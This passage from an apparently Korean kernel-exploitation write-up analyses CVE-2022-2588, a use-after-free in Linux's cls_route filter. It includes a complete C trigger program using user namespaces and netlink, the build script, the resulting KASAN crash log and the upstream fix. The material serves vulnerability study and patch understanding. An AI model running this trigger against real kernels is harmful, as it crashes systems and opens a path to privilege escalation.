61
62 rtnl_close(&rthdle);
63}
64
65int main(int argc, char *argv[])
66{
67 int res;
68
69 res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
70 if (res == -1)
71 die("unshare");
72
73 user_tc_new_tfilter("lo",
74 RTM_NEWTFILTER,
75 NLM_F_CREATE,
76 0x0,
77 0xbeef, ETH_P_LOOP,
78 "route",
79 0x100000000, 0x100000000);
80 return 0;
81}
Putting it all together #
이제 지금까지 설명한 것과 필터를 교체하는 것을 합쳐서 UAF를 트리거해보자. 먼저 필터 교체를 하려면 상기에 언급한 어트리뷰트 중 TCA_ROUTE4FROM과 TCA_ROUTE4TO가 기존 값들과 다르게 하여 새 필터를 생성해야 한다. 왜냐하면 이미 존재하는 경우에는 EEXIST 오류가 발생가능하기 때문이다. 이는 route4_setparms 함수로 알 수 있다 (net/sched/cls_route.c에서 발췌)[3].
1static int route4_set_parms(struct net *net, struct tcf_proto *tp,
2 unsigned long base, struct route4_filter *f,
3 u32 handle, struct route4_head *head,
4 struct nlattr **tb, struct nlattr *est, int new,
5 u32 flags, struct netlink_ext_ack *extack)
6{
7 u32 id = 0, to = 0, nhandle = 0x8000;
8 struct route4_filter *fp;
9 unsigned int h1;
10 struct route4_bucket *b;
11 int err;
12
13 err = tcf_exts_validate(net, tp, tb, est, &f->exts, flags, extack);
14 if (err < 0)
15 return err;
16
17 if (tb[TCA_ROUTE4_TO]) {
18 if (new && handle & 0x8000)
19 return -EINVAL;
20 to = nla_get_u32(tb[TCA_ROUTE4_TO]);
21 if (to > 0xFF)
22 return -EINVAL;
23 nhandle = to;
24 }
25
26 if (tb[TCA_ROUTE4_FROM]) {
27 if (tb[TCA_ROUTE4_IIF])
28 return -EINVAL;
29 id = nla_get_u32(tb[TCA_ROUTE4_FROM]);
30 if (id > 0xFF)
31 return -EINVAL;
32 nhandle |= id << 16;
33 } else if (tb[TCA_ROUTE4_IIF]) {
34 id = nla_get_u32(tb[TCA_ROUTE4_IIF]);
35 if (id > 0x7FFF)
36 return -EINVAL;
37 nhandle |= (id | 0x8000) << 16;
38 } else
39 nhandle |= 0xFFFF << 16;
40
41 if (handle && new) {
42 nhandle |= handle & 0x7F00;
43 if (nhandle != handle)
44 return -EINVAL;
45 }
46
47 h1 = to_hash(nhandle);
48 b = rtnl_dereference(head->table[h1]);
49 if (!b) {
50 b = kzalloc(sizeof(struct route4_bucket), GFP_KERNEL);
51 if (b == NULL)
52 return -ENOBUFS;
53
54 rcu_assign_pointer(head->table[h1], b);
55 } else {
56 unsigned int h2 = from_hash(nhandle >> 16);
57
58 for (fp = rtnl_dereference(b->ht[h2]);
59 fp;
60 fp = rtnl_dereference(fp->next))
61 if (fp->handle == f->handle)
62 return -EEXIST;
63 }
64
65 /* ... */
66
67 return 0;
68}
그럼 다음과 같이 UAF를 트리거하는 코드를 작성할 수 있다[8].
1#define _GNU_SOURCE
2
3#include <stdio.h>
4#include <string.h>
5#include <stdlib.h>
6#include <stdint.h>
7#include <stdbool.h>
8#include <signal.h>
9#include <time.h>
10#include <sys/mman.h>
11#include <sys/types.h>
12#include <sys/utsname.h>
13#include <sys/wait.h>
14#include <sys/socket.h>
15#include <sys/ioctl.h>
16#include <sys/uio.h>
17#include <unistd.h>
18#include <sched.h>
19#include <fcntl.h>
20#include <syslog.h>
21#include <errno.h>
22#include <netinet/in.h>
23#include <arpa/inet.h>
24#include <net/if.h>
25#include <net/if_arp.h>
26#include <linux/if_link.h>
27#include <linux/neighbour.h>
28#include <linux/netconf.h>
29#include <linux/if_ether.h>
30#include <asm/types.h>
31#include <linux/netlink.h>
32#include <linux/rtnetlink.h>
33#include <libnl3/netlink/route/tc.h>
34#include <libnl3/netlink/route/qdisc.h>
35#include <libnl3/netlink/route/qdisc/tbf.h>
36
37/* ----------------------< libnetlink >--------------------------------- */
38
39struct rtnl_handle {
40 int fd;
41 struct sockaddr_nl local;
42 struct sockaddr_nl peer;
43 __u32 seq;
44 __u32 dump;
45 int proto;
46 FILE *dump_fp;
47#define RTNL_HANDLE_F_LISTEN_ALL_NSID 0x01
48 int flags;
49};
50
51#define NLMSG_TAIL(nmsg) \
52 ((struct rtattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
53
54
55static inline const char *rta_getattr_str(const struct rtattr *rta)
56{
57 return (const char *)RTA_DATA(rta);
58}
59
60static int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
61 int alen)
62{
63 int len = RTA_LENGTH(alen);
64 struct rtattr *rta;
65
66 if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
67 fprintf(stderr,
68 "addattr_l ERROR: message exceeded bound of %d\n",
69 maxlen);
70 return -1;
71 }
72 rta = NLMSG_TAIL(n);
73 rta->rta_type = type;
74 rta->rta_len = len;
75 memcpy(RTA_DATA(rta), data, alen);
76 n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
77 return 0;
78}
79
80static int addattr32(struct nlmsghdr *n, int maxlen, int type, __u32 data)
81{
82 return addattr_l(n, maxlen, type, &data, sizeof(__u32));
83}
84
85static int addattr64(struct nlmsghdr *n, int maxlen, int type, __u64 data)
86{
87 return addattr_l(n, maxlen, type, &data, sizeof(__u64));
88}
89
90static struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
91{
92 struct rtattr *nest = NLMSG_TAIL(n);
93
94 addattr_l(n, maxlen, type, NULL, 0);
95 /* addattr_l(n, maxlen, type, &nest, 8); */
96 return nest;
97}
98
99static int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
100{
101 nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
102 return n->nlmsg_len;
103}
104
105#ifndef SOL_NETLINK
106#define SOL_NETLINK 270
107#endif
108
109#ifndef MIN
110#define MIN(a, b) ((a) < (b) ? (a) : (b))
111#endif
112
113static int rcvbuf =1024 * 1024;
114
115static void rtnl_close(struct rtnl_handle *rth)
116{
117 if (rth->fd >= 0) {
118 close(rth->fd);
119 rth->fd = -1;
120 }
121}
122
123static int rtnl_open_byproto(struct rtnl_handle *rth, unsigned int subscriptions,
124 int protocol)
125{
126 socklen_t addr_len;
127 int sndbuf = 32768;
128
129 memset(rth, 0, sizeof(*rth));
130
131 rth->proto = protocol;
132 rth->fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, protocol);
133 if (rth->fd < 0) {
134 perror("Cannot open netlink socket");
135 return -1;
136 }
137
138 if (setsockopt(rth->fd, SOL_SOCKET, SO_SNDBUF,
139 &sndbuf, sizeof(sndbuf)) < 0) {
140 perror("SO_SNDBUF");
141 return -1;
142 }
143
144 if (setsockopt(rth->fd, SOL_SOCKET, SO_RCVBUF,
145 &rcvbuf, sizeof(rcvbuf)) < 0) {
146 perror("SO_RCVBUF");
147 return -1;
148 }
149
150 memset(&rth->local, 0, sizeof(rth->local));
151 rth->local.nl_family = AF_NETLINK;
152 rth->local.nl_groups = subscriptions;
153
154 if (bind(rth->fd, (struct sockaddr *)&rth->local,
155 sizeof(rth->local)) < 0) {
156 perror("Cannot bind netlink socket");
157 return -1;
158 }
159 addr_len = sizeof(rth->local);
160 if (getsockname(rth->fd, (struct sockaddr *)&rth->local,
161 &addr_len) < 0) {
162 perror("Cannot getsockname");
163 return -1;
164 }
165 if (addr_len != sizeof(rth->local)) {
166 fprintf(stderr, "Wrong address length %d\n", addr_len);
167 return -1;
168 }
169 if (rth->local.nl_family != AF_NETLINK) {
170 fprintf(stderr, "Wrong address family %d\n",
171 rth->local.nl_family);
172 return -1;
173 }
174 rth->seq = time(NULL);
175 return 0;
176}
177
178static int rtnl_open(struct rtnl_handle *rth, unsigned int subscriptions)
179{
180 return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
181}
182
183static int __rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
184 struct nlmsghdr *answer, size_t maxlen,
185 bool show_rtnl_err)
186{
187 int status;
188 unsigned int seq;
189 struct nlmsghdr *h;
190 struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
191 struct iovec iov = {
192 .iov_base = n,
193 .iov_len = n->nlmsg_len
194 };
195 struct msghdr msg = {
196 .msg_name = &nladdr,
197 .msg_namelen = sizeof(nladdr),
198 .msg_iov = &iov,
199 .msg_iovlen = 1,
200 };
201 char buf[32768] = {};
202
203 n->nlmsg_seq = seq = ++rtnl->seq;
204
205 if (answer == NULL)
206 n->nlmsg_flags |= NLM_F_ACK;
207
208 status = sendmsg(rtnl->fd, &msg, 0);
209 if (status < 0) {
210 perror("Cannot talk to rtnetlink");
211 return -1;
212 }
213
214 iov.iov_base = buf;
215 while (1) {
216 iov.iov_len = sizeof(buf);
217 status = recvmsg(rtnl->fd, &msg, 0);
218
219 if (status < 0) {
220 if (errno == EINTR || errno == EAGAIN)
221 continue;
222 fprintf(stderr, "netlink receive error %s (%d)\n",
223 strerror(errno), errno);
224 return -1;
225 }
226 if (status == 0) {
227 fprintf(stderr, "EOF on netlink\n");
228 return -1;
229 }
230 if (msg.msg_namelen != sizeof(nladdr)) {
231 fprintf(stderr,
232 "sender address length == %d\n",
233 msg.msg_namelen);
234 exit(1);
235 }
236 for (h = (struct nlmsghdr *)buf; status >= sizeof(*h); ) {
237 int len = h->nlmsg_len;
238 int l = len - sizeof(*h);
239
240 /* DumpHex(&msg, len); */
241
242 if (l < 0 || len > status) {
243 if (msg.msg_flags & MSG_TRUNC) {
244 fprintf(stderr, "Truncated message\n");
245 return -1;
246 }
247 fprintf(stderr,
248 "!!!malformed message: len=%d\n",
249 len);
250 exit(1);
251 }
252
253 if (nladdr.nl_pid != 0 ||
254 h->nlmsg_pid != rtnl->local.nl_pid ||
255 h->nlmsg_seq != seq) {
256 /* Don't forget to skip that message. */
257 status -= NLMSG_ALIGN(len);
258 h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
259 continue;
260 }
261
262 if (h->nlmsg_type == NLMSG_ERROR) {
263 struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);
264
265 if (l < sizeof(struct nlmsgerr)) {
266 fprintf(stderr, "ERROR truncated\n");
267 } else if (!err->error) {
268 if (answer)
269 memcpy(answer, h,
270 MIN(maxlen, h->nlmsg_len));
271 return 0;
272 }
273
274 if (rtnl->proto != NETLINK_SOCK_DIAG && show_rtnl_err)
275 fprintf(stderr,
276 "RTNETLINK answers: %s\n",
277 strerror(-err->error));
278 errno = -err->error;
279 return -1;
280 }
281
282 if (answer) {
283 memcpy(answer, h,
284 MIN(maxlen, h->nlmsg_len));
285 return 0;
286 }
287
288 fprintf(stderr, "Unexpected reply!!!\n");
289
290 status -= NLMSG_ALIGN(len);
291 h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
292 }
293
294 if (msg.msg_flags & MSG_TRUNC) {
295 fprintf(stderr, "Message truncated\n");
296 continue;
297 }
298
299 if (status) {
300 fprintf(stderr, "!!!Remnant of size %d\n", status);
301 exit(1);
302 }
303 }
304}
305
306static int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
307 struct nlmsghdr *answer, size_t maxlen)
308{
309 return __rtnl_talk(rtnl, n, answer, maxlen, true);
310}
311
312static int parse_rtattr_flags(struct rtattr *tb[], int max, struct rtattr *rta,
313 int len, unsigned short flags)
314{
315 unsigned short type;
316
317 memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
318 while (RTA_OK(rta, len)) {
319 type = rta->rta_type & ~flags;
320 if ((type <= max) && (!tb[type]))
321 tb[type] = rta;
322 rta = RTA_NEXT(rta, len);
323 }
324 if (len)
325 fprintf(stderr, "!!!Deficit %d, rta_len=%d\n",
326 len, rta->rta_len);
327 return 0;
328}
329
330/* --------------------------------------------------------------------- */
331
332enum {
333 TCA_BUF_MAX = (64 * 1024)
334};
335
336struct tc_req {
337 struct nlmsghdr hdr;
338 struct tcmsg tchdr;
339 uint8_t buf[TCA_BUF_MAX];
340};
341
342void die(const char *funcname)
343{
344 perror(funcname);
345 exit(EXIT_FAILURE);
346}
347
348#define LOG printf
349#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)
350
351void print_qdisc_info(const char *ifname)
352{
353 int err;
354 struct nlmsghdr res;
355 struct tcmsg *t;
356 struct rtattr *tb[TCA_MAX + 1];
357 struct rtnl_handle rth;
358 struct tc_req qdreq;
359
360 LOG_FUNC();
361
362 err = rtnl_open(&rth, 0);
363 if (err)
364 die("rtnl_open");
365
366 bzero(&qdreq, sizeof(qdreq));
367 qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
368 qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
369 qdreq.hdr.nlmsg_type = RTM_GETQDISC;
370
371 qdreq.tchdr.tcm_family = AF_UNSPEC;
372 qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
373
374 LOG("ifindex: %d\n", qdreq.tchdr.tcm_ifindex);
375
376 err = rtnl_talk(&rth, &qdreq.hdr, &res, TCA_BUF_MAX);
377 if (err < 0)
378 die("rtnl_talk");
379
380 t = NLMSG_DATA(&res);
381 if (res.nlmsg_type != RTM_NEWQDISC && res.nlmsg_type != RTM_DELQDISC)
382 die("Not a qdisc");
383
384 parse_rtattr_flags(tb,
385 TCA_MAX,
386 TCA_RTA(t),
387 res.nlmsg_len - NLMSG_LENGTH(sizeof(*t)),
388 NLA_F_NESTED);
389 printf("qdisc %s %x:[%08x]\n", rta_getattr_str(tb[TCA_KIND]),
390 t->tcm_handle >> 16, t->tcm_handle);
391
392 rtnl_close(&rth);
393}
394
395void user_tc_modify_qdisc(const char *ifname, int cmd, unsigned int flags,
396 uint32_t handle, const char *kind)
397{
398 int err;
399 struct rtnl_handle rth;
400 struct tc_req qdreq;
401 struct rtattr *tail;
402 struct tc_htb_glob glob;
403
404 LOG_FUNC();
405
406 err = rtnl_open(&rth, 0);
407 if (err)
408 die("rtnl_open");
409
410 qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
411 qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
412 qdreq.hdr.nlmsg_type = cmd;
413
414 qdreq.tchdr.tcm_family = AF_UNSPEC;
415 qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
416 qdreq.tchdr.tcm_handle = handle;
417 qdreq.tchdr.tcm_parent = TC_H_ROOT;
418
419 addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_KIND, kind, strlen(kind));
420 tail = addattr_nest(&qdreq.hdr, sizeof(qdreq), TCA_OPTIONS);
421 bzero(&glob, sizeof(glob));
422 glob.version = 0x00030011 >> 16;
423 addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_HTB_INIT,
424 &glob, sizeof(glob));
425 addattr_nest_end(&qdreq.hdr, tail);
426
427 err = rtnl_talk(&rth, &qdreq.hdr, NULL, 0);
428 if (err < 0)
429 die("rtnl_talk");
430
431 rtnl_close(&rth);
432}
433
434void user_tc_new_tfilter(const char *ifname, int cmd,
435 unsigned int flags, uint32_t handle, uint16_t prio,
436 uint16_t proto,
437 const char *kind, uint64_t from, uint64_t to)
438{
439 int err;
440 struct rtnl_handle rthdle;
441 struct tc_req req;
442 struct rtattr *tail;
443
444 LOG_FUNC();
445
446 err = rtnl_open(&rthdle, 0);
447 if (err < 0)
448 die("rtnl_open");
449
450 bzero(&req, sizeof(req));
451 req.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req.tchdr));
452 req.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
453 req.hdr.nlmsg_type = cmd;
454
455 req.tchdr.tcm_family = AF_UNSPEC;
456 req.tchdr.tcm_ifindex = if_nametoindex(ifname);
457 req.tchdr.tcm_info = TC_H_MAKE(prio << 16, proto);
458 req.tchdr.tcm_handle = handle;
459
460 addattr_l(&req.hdr, sizeof(req),
461 TCA_KIND,
462 kind, strlen(kind));
463 tail = addattr_nest(&req.hdr, sizeof(req), TCA_OPTIONS);
464 addattr64(&req.hdr, sizeof(req),
465 TCA_ROUTE4_TO,
466 to);
467 addattr64(&req.hdr, sizeof(req),
468 TCA_ROUTE4_FROM,
469 from);
470 addattr_nest_end(&req.hdr, tail);
471
472 err = rtnl_talk(&rthdle, &req.hdr, NULL, 0);
473 if (err < 0)
474 die("rtnl_talk");
475
476 rtnl_close(&rthdle);
477}
478
479int main(int argc, char *argv[])
480{
481 int res;
482
483 res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
484 if (res == -1)
485 die("unshare");
486
487 user_tc_modify_qdisc("lo",
488 RTM_NEWQDISC,
489 NLM_F_CREATE,
490 0x10000,
491 "htb");
492 print_qdisc_info("lo");
493
494 user_tc_new_tfilter("lo",
495 RTM_NEWTFILTER,
496 NLM_F_CREATE,
497 0x0,
498 0xbeef, ETH_P_LOOP,
499 "route",
500 0x100000000, 0x100000000);
501 user_tc_new_tfilter("lo",
502 RTM_NEWTFILTER,
503 NLM_F_CREATE,
504 0x0,
505 0xbeef, ETH_P_LOOP,
506 "route",
507 0x1, 0x1);
508 return 0;
509}
위 코드를 다음과 같이 컴파일 한 후,
1#!/bin/bash
2
3src=$1
4exe=${src:0:-2}
5
6gcc -I/usr/include/libnl3/ $src -o $exe -lnl-3 -lmnl -lnl-route-3
실행하면 다음을 얻는다.
1[ 3136.361496] ==================================================================
2[ 3136.364037] BUG: KASAN: use-after-free in route4_destroy+0x190/0x4d0 [cls_route]
3[ 3136.365314] Read of size 8 at addr ffff88800ba2d000 by task kworker/u4:0/1427
4[ 3136.366115]
5[ 3136.366350] CPU: 1 PID: 1427 Comm: kworker/u4:0 Not tainted 5.18.0 #1
6[ 3136.367041] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
7[ 3136.368194] Workqueue: netns cleanup_net
8[ 3136.368693] Call Trace:
9[ 3136.369014] <TASK>
10[ 3136.369306] dump_stack_lvl+0x49/0x60
11[ 3136.369757] print_report.cold+0x5e/0x5d0
12[ 3136.370253] ? route4_destroy+0x190/0x4d0 [cls_route]
13[ 3136.370831] kasan_report+0xaa/0x120
14[ 3136.371282] ? route4_destroy+0x190/0x4d0 [cls_route]
15[ 3136.371856] __asan_load8+0x87/0xb0
16[ 3136.372285] route4_destroy+0x190/0x4d0 [cls_route]
17[ 3136.372842] ? route4_init+0x60/0x60 [cls_route]
18[ 3136.373404] ? __kasan_check_write+0x14/0x20
19[ 3136.373909] ? mutex_unlock+0x81/0xd0
20[ 3136.374367] tcf_proto_destroy+0x54/0x150
21[ 3136.374863] tcf_proto_put+0x5b/0x80
22[ 3136.375300] tcf_chain_flush+0xdf/0x150
23[ 3136.375759] __tcf_block_put+0xea/0x1c0
24[ 3136.376458] tcf_block_put+0xca/0x110
25[ 3136.376928] ? tcf_block_put_ext+0x60/0x60
26[ 3136.377424] htb_destroy+0xed/0x760 [sch_htb]
27[ 3136.377943] ? rcu_exp_wait_wake+0x570/0x570
28[ 3136.378455] ? htb_destroy_class_offload+0x830/0x830 [sch_htb]
29[ 3136.379140] ? htb_reset+0x1dd/0x2a0 [sch_htb]
30[ 3136.379699] ? qdisc_reset+0x1dd/0x280
31[ 3136.380268] qdisc_destroy+0x63/0x150
32[ 3136.380764] qdisc_put+0x6b/0x80
33[ 3136.381373] dev_shutdown+0x129/0x180
34[ 3136.382049] unregister_netdevice_many+0x4dd/0xc50
35[ 3136.382872] ? __kasan_check_read+0x11/0x20
36[ 3136.383549] ? dev_cpu_dead+0x400/0x400
37[ 3136.384121] ? unregister_netdevice_many+0xc50/0xc50
38[ 3136.384876] default_device_exit_batch+0x2df/0x370
39[ 3136.385603] ? __dev_change_net_namespace+0xaf0/0xaf0
40[ 3136.386357] ops_exit_list+0x92/0xa0
41[ 3136.386927] cleanup_net+0x2f3/0x5e0
42[ 3136.387493] ? unregister_pernet_device+0x60/0x60
43[ 3136.388204] ? rtnl_unlock+0xe/0x20
44[ 3136.388757] process_one_work+0x44f/0x740
45[ 3136.389400] worker_thread+0x2bb/0x6f0
46[ 3136.389986] ? process_one_work+0x740/0x740
47[ 3136.390629] kthread+0x179/0x1b0
48[ 3136.392849] ? kthread_complete_and_exit+0x30/0x30
49[ 3136.395048] ret_from_fork+0x22/0x30
50[ 3136.397079] </TASK>
51[ 3136.398830]
52[ 3136.400410] Allocated by task 1445:
53[ 3136.402366]
54[ 3136.403954] Freed by task 1427:
55[ 3136.405785]
56[ 3136.407233] Last potentially related work creation:
57[ 3136.409123]
58[ 3136.410537] Second to last potentially related work creation:
59[ 3136.412539]
60[ 3136.414005] The buggy address belongs to the object at ffff88800ba2d000
61[ 3136.414005] which belongs to the cache kmalloc-192 of size 192
62[ 3136.418199] The buggy address is located 0 bytes inside of
63[ 3136.418199] 192-byte region [ffff88800ba2d000, ffff88800ba2d0c0)
64[ 3136.422262]
65[ 3136.423764] The buggy address belongs to the physical page:
66[ 3136.425828]
67[ 3136.427344] Memory state around the buggy address:
68[ 3136.429290] ffff88800ba2cf00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
69[ 3136.431594] ffff88800ba2cf80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
70[ 3136.433601] >ffff88800ba2d000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
71[ 3136.435610] ^
72[ 3136.437281] ffff88800ba2d080: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
73[ 3136.439355] ffff88800ba2d100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
74[ 3136.441418] ==================================================================
75[ 3136.444173] general protection fault, probably for non-canonical address 0x92a000ea00000593: 0000 [#1] PREEMPT SMP KASAN PTI
76[ 3136.447177] CPU: 1 PID: 1427 Comm: kworker/u4:0 Tainted: G B W 5.18.0 #1
77[ 3136.449696] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
78[ 3136.452337] Workqueue: netns cleanup_net
79[ 3136.454369] RIP: 0010:tcf_action_destroy+0x85/0xd0
80[ 3136.456484] Code: ff 48 83 c3 08 48 39 5d d0 74 55 48 89 df e8 f2 ed 31 ff 4c 8b 23 4d 85 e4 74 45 48 c7 03 00 00 00 00 4c 89 e7 e8 db ed 31 f
81[ 3136.461858] RSP: 0018:ffff888102d0f6a8 EFLAGS: 00010296
82[ 3136.464262] RAX: 0000000000000000 RBX: ffff888107ef9008 RCX: ffffffffa622a125
83[ 3136.466742] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 92a000ea00000593
84[ 3136.469217] RBP: ffff888102d0f6d8 R08: 0000000000000001 R09: 0000000000000003
85[ 3136.471680] R10: ffffed1001745a04 R11: 0000000000000001 R12: 92a000ea00000593
86[ 3136.474156] R13: 0000000000000001 R14: ffff8881041b8540 R15: 0000000000000000
87[ 3136.476624] FS: 0000000000000000(0000) GS:ffff888109b00000(0000) knlGS:0000000000000000
88[ 3136.479227] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
89[ 3136.481859] CR2: 0000564fe64f7650 CR3: 0000000106a8c000 CR4: 00000000000006e0
90[ 3136.484757] Call Trace:
91[ 3136.487477] <TASK>
92[ 3136.490650] tcf_exts_destroy+0x2e/0x60
93[ 3136.493054] route4_destroy+0x2ee/0x4d0 [cls_route]
94[ 3136.495654] ? route4_init+0x60/0x60 [cls_route]
95[ 3136.498213] ? __kasan_check_write+0x14/0x20
96[ 3136.500784] ? mutex_unlock+0x81/0xd0
97[ 3136.503186] tcf_proto_destroy+0x54/0x150
98[ 3136.505625] tcf_proto_put+0x5b/0x80
99[ 3136.508134] tcf_chain_flush+0xdf/0x150
100[ 3136.510616] __tcf_block_put+0xea/0x1c0
101[ 3136.513100] tcf_block_put+0xca/0x110
102[ 3136.515600] ? tcf_block_put_ext+0x60/0x60
103[ 3136.518110] htb_destroy+0xed/0x760 [sch_htb]
104[ 3136.520595] ? rcu_exp_wait_wake+0x570/0x570
105[ 3136.523096] ? htb_destroy_class_offload+0x830/0x830 [sch_htb]
106[ 3136.525794] ? htb_reset+0x1dd/0x2a0 [sch_htb]
107[ 3136.528551] ? qdisc_reset+0x1dd/0x280
108[ 3136.531346] qdisc_destroy+0x63/0x150
109[ 3136.534156] qdisc_put+0x6b/0x80
110[ 3136.536581] dev_shutdown+0x129/0x180
111[ 3136.539066] unregister_netdevice_many+0x4dd/0xc50
112[ 3136.541621] ? __kasan_check_read+0x11/0x20
113[ 3136.544207] ? dev_cpu_dead+0x400/0x400
114[ 3136.546622] ? unregister_netdevice_many+0xc50/0xc50
115[ 3136.549100] default_device_exit_batch+0x2df/0x370
116[ 3136.551570] ? __dev_change_net_namespace+0xaf0/0xaf0
117[ 3136.554065] ops_exit_list+0x92/0xa0
118[ 3136.556520] cleanup_net+0x2f3/0x5e0
119[ 3136.558804] ? unregister_pernet_device+0x60/0x60
120[ 3136.561209] ? rtnl_unlock+0xe/0x20
121[ 3136.563448] process_one_work+0x44f/0x740
122[ 3136.565930] worker_thread+0x2bb/0x6f0
123[ 3136.568190] ? process_one_work+0x740/0x740
124[ 3136.570541] kthread+0x179/0x1b0
125[ 3136.572620] ? kthread_complete_and_exit+0x30/0x30
126[ 3136.574997] ret_from_fork+0x22/0x30
127[ 3136.577103] </TASK>
128[ 3136.578972] Modules linked in: cls_route sch_htb isofs binfmt_misc nls_iso8859_1 ppdev joydev input_leds parport_pc serio_raw mac_hid parporti
129[ 3136.592765] ---[ end trace 0000000000000000 ]---
130[ 3136.595224] RIP: 0010:tcf_action_destroy+0x85/0xd0
131[ 3136.597666] Code: ff 48 83 c3 08 48 39 5d d0 74 55 48 89 df e8 f2 ed 31 ff 4c 8b 23 4d 85 e4 74 45 48 c7 03 00 00 00 00 4c 89 e7 e8 db ed 31 f
132[ 3136.603930] RSP: 0018:ffff888102d0f6a8 EFLAGS: 00010296
133[ 3136.606569] RAX: 0000000000000000 RBX: ffff888107ef9008 RCX: ffffffffa622a125
134[ 3136.609403] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 92a000ea00000593
135[ 3136.612241] RBP: ffff888102d0f6d8 R08: 0000000000000001 R09: 0000000000000003
136[ 3136.615034] R10: ffffed1001745a04 R11: 0000000000000001 R12: 92a000ea00000593
137[ 3136.617558] R13: 0000000000000001 R14: ffff8881041b8540 R15: 0000000000000000
138[ 3136.620093] FS: 0000000000000000(0000) GS:ffff888109b00000(0000) knlGS:0000000000000000
139[ 3136.622819] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
140[ 3136.625241] CR2: 0000564fe64f7650 CR3: 0000000106a8c000 CR4: 00000000000006e0
Patch #
이 취약점은 해제되는 fold 포인터 변수가 NULL이 아닌 것 이외에 그 핸들 값도 같은 방식으로 검사하였기 때문에 발생하였다. 그래서 패치는 fold 포인터 변수만 검사하는 방식으로 다음과 같이 진행됐다[12].
1diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
2index a35ab8c27866..3f935cbbaff6 100644
3--- a/net/sched/cls_route.c
4+++ b/net/sched/cls_route.c
5@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
6 rcu_assign_pointer(f->next, f1);
7 rcu_assign_pointer(*fp, f);
8
9- if (fold && fold->handle && f->handle != fold->handle) {
10+ if (fold) {
11 th = to_hash(fold->handle);
12 h = from_hash(fold->handle >> 16);
13 b = rtnl_dereference(head->table[th]);
14--
References #
- 0xCD4, "kernel-ctf-lab." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/0xCD4/kernel-ctf-lab
- "CVE-2022-2588 Detail." nvd.nist.gov, Accessed: May. 26, 2026. [Online]. Available: https://nvd.nist.gov/vuln/detail/cve-2022-2588
- Linus Torvalds et al., "Linux kernel", (Version 5.18) [Source Code]. https://github.com/torvalds/linux
- "netlink(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/netlink.7.html
- "rtnetlink(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/rtnetlink.7.html
- "Introduction to Netlink." docs.kernel.org, Accessed: May. 26, 2026. [Online]. Available: https://docs.kernel.org/userspace-api/netlink/intro.html
- moises-silva, "libnetlink examples." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/moises-silva/libnetlink-examples/tree/master
- iproute2, "This is a set of utilities for Linux networking." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/iproute2/iproute2
- "unshare(2) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man2/unshare.2.html
- "user_namespaces(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/user_namespaces.7.html
- "tc(8) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man8/tc.8.html
- "[PATCH] net_sched: cls_route: remove from list when handle is 0." lore.kernel.org, Accessed: May. 31, 2026. [Online]. Available: https://lore.kernel.org/netdev/20220809170518.164662-1-cascardo@canonical.com/T/#u